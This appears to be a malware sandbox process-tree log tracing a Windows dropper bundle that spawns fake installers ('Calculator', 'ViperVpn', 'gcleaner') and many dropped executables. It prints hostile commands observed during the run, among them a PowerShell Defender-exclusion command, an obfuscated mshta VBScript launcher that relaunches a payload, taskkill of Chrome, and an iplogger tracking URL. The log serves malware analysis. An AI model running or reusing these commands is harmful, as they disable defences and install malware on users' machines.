C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:213⤵PID:7104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:313⤵PID:6196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:813⤵PID:1596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:113⤵PID:488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:113⤵PID:5916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:113⤵PID:7792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:113⤵PID:8252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:113⤵PID:8284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:813⤵PID:11168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:813⤵PID:11248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:113⤵PID:11640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1d-44fa1-b48-24cb8-e6f4fb162a982\Waemopaniri.exe"C:\Users\Admin\AppData\Local\Temp\1d-44fa1-b48-24cb8-e6f4fb162a982\Waemopaniri.exe"11⤵PID:920
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit12⤵PID:14064
-
C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exeC:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet13⤵PID:5640
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633372098 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"14⤵PID:2876
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w4v3nnmp.4gn\Calculator%20Installation.exe & exit12⤵PID:16180
-
C:\Users\Admin\AppData\Local\Temp\w4v3nnmp.4gn\Calculator%20Installation.exeC:\Users\Admin\AppData\Local\Temp\w4v3nnmp.4gn\Calculator%20Installation.exe13⤵PID:7084
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=114⤵PID:8864
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--RBSvZ"15⤵PID:13108
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff9e9aadec0,0x7ff9e9aaded0,0x7ff9e9aadee016⤵PID:13584
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6b77f9e70,0x7ff6b77f9e80,0x7ff6b77f9e9017⤵PID:13620
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:216⤵PID:13800
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=1944 /prefetch:816⤵PID:13816
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2428 /prefetch:116⤵PID:13940
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2536 /prefetch:116⤵PID:13968
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=2240 /prefetch:816⤵PID:13888
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:216⤵PID:15400
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=3344 /prefetch:816⤵PID:15568
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=3400 /prefetch:816⤵PID:15804
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uktkhbyl.tng\GcleanerEU.exe /eufive & exit12⤵PID:16256
-
C:\Users\Admin\AppData\Local\Temp\uktkhbyl.tng\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\uktkhbyl.tng\GcleanerEU.exe /eufive13⤵
- Executes dropped EXE
PID:5508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 30014⤵
- Program crash
PID:6444
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:16364
-
C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exeC:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exe /qn CAMPAIGN="654"13⤵
- Executes dropped EXE
PID:5848 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633372098 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵PID:8068
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p2ayg3qv.g3a\any.exe & exit12⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\p2ayg3qv.g3a\any.exeC:\Users\Admin\AppData\Local\Temp\p2ayg3qv.g3a\any.exe13⤵PID:4964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe & exit12⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exeC:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe13⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exeC:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe14⤵PID:5480
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1hrBr715⤵PID:11556
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e99646f8,0x7ff9e9964708,0x7ff9e996471816⤵PID:11584
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fayw31hb.p5e\customer9.exe & exit12⤵PID:2924
-
C:\Users\Admin\AppData\Local\Temp\fayw31hb.p5e\customer9.exeC:\Users\Admin\AppData\Local\Temp\fayw31hb.p5e\customer9.exe13⤵PID:7140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exe & exit12⤵PID:4348
-
C:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exeC:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exe13⤵PID:7752
-
C:\Users\Admin\AppData\Local\Temp\is-OA64C.tmp\ViperVpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-OA64C.tmp\ViperVpn.tmp" /SL5="$203C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exe"14⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\is-122EO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-122EO.tmp\Setup.exe" /Verysilent15⤵PID:9188
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im chrome.exe16⤵PID:9312
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe17⤵
- Kills process with taskkill
PID:9816
-
-
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\System32\gpupdate.exe" /force16⤵PID:9304
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\auiio4mx.emp\gcleaner.exe /mixfive & exit12⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\auiio4mx.emp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\auiio4mx.emp\gcleaner.exe /mixfive13⤵PID:7896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7896 -s 30414⤵
- Program crash
PID:8988
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylckyfcu.ett\autosubplayer.exe /S & exit12⤵PID:7396
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4tnomkc.x5x\installer.exe /qn CAMPAIGN=654 & exit12⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\g4tnomkc.x5x\installer.exeC:\Users\Admin\AppData\Local\Temp\g4tnomkc.x5x\installer.exe /qn CAMPAIGN=65413⤵PID:8588
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NFf7cNciBAJhVUUqntgPPjMs.exe"C:\Users\Admin\Pictures\Adobe Films\NFf7cNciBAJhVUUqntgPPjMs.exe" silent8⤵PID:9160
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\a41UKoB6rMkA7Wr31HaVnoPd.exe"C:\Users\Admin\Pictures\Adobe Films\a41UKoB6rMkA7Wr31HaVnoPd.exe"6⤵
- Executes dropped EXE
PID:5568
-
-
C:\Users\Admin\Pictures\Adobe Films\S__npfqx6N5GczvFZe3z9Ey8.exe"C:\Users\Admin\Pictures\Adobe Films\S__npfqx6N5GczvFZe3z9Ey8.exe"6⤵
- Executes dropped EXE
PID:5560
-
-
C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe"C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe"6⤵
- Executes dropped EXE
PID:5544 -
C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe"C:\Users\Admin\Pictures\Adobe Films\xI8yS68Tpu3kCNSU44QBhykw.exe"7⤵PID:4060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 19047⤵
- Program crash
PID:4504
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WayqjmEj2Pq_PUl4bua9Hc2R.exe"C:\Users\Admin\Pictures\Adobe Films\WayqjmEj2Pq_PUl4bua9Hc2R.exe"6⤵
- Executes dropped EXE
PID:5536
-
-
C:\Users\Admin\Pictures\Adobe Films\HL0ONOO9xTh4E8f90wc3b06k.exe"C:\Users\Admin\Pictures\Adobe Films\HL0ONOO9xTh4E8f90wc3b06k.exe"6⤵
- Executes dropped EXE
PID:5524 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\HL0ONOO9xTh4E8f90wc3b06k.exe" & exit7⤵PID:2180
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:3908
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n3DsS2xEWbU65FEFGXsqrGdV.exe"C:\Users\Admin\Pictures\Adobe Films\n3DsS2xEWbU65FEFGXsqrGdV.exe"6⤵PID:5848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 2687⤵
- Program crash
PID:5744
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
PID:2288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 3046⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
PID:3192 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1228
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵PID:2220
-
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
PID:4908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 3046⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3912
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
PID:2644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4012 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 18966⤵
- Program crash
PID:5232
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵PID:2924
-
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2560 -
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu164ba03be19.exe6⤵
- Executes dropped EXE
PID:4972
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵PID:2832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4432
-
-
-
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv clZulJdZrEmnxn7nVWmdrw.01⤵PID:2376
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv clZulJdZrEmnxn7nVWmdrw.0.22⤵PID:5192
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:4848
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 92GwURs0+UOTl7UTHcO7Cw.0.21⤵
- Modifies data under HKEY_USERS
PID:4616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2232
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe f09cd4e4115abaa1e141ee1a978a44bd clZulJdZrEmnxn7nVWmdrw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:1716
-
C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exeThu1653d94a8da.exe1⤵
- Executes dropped EXE
PID:1500 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )2⤵PID:568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC84C3DC3\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"3⤵PID:3712
-
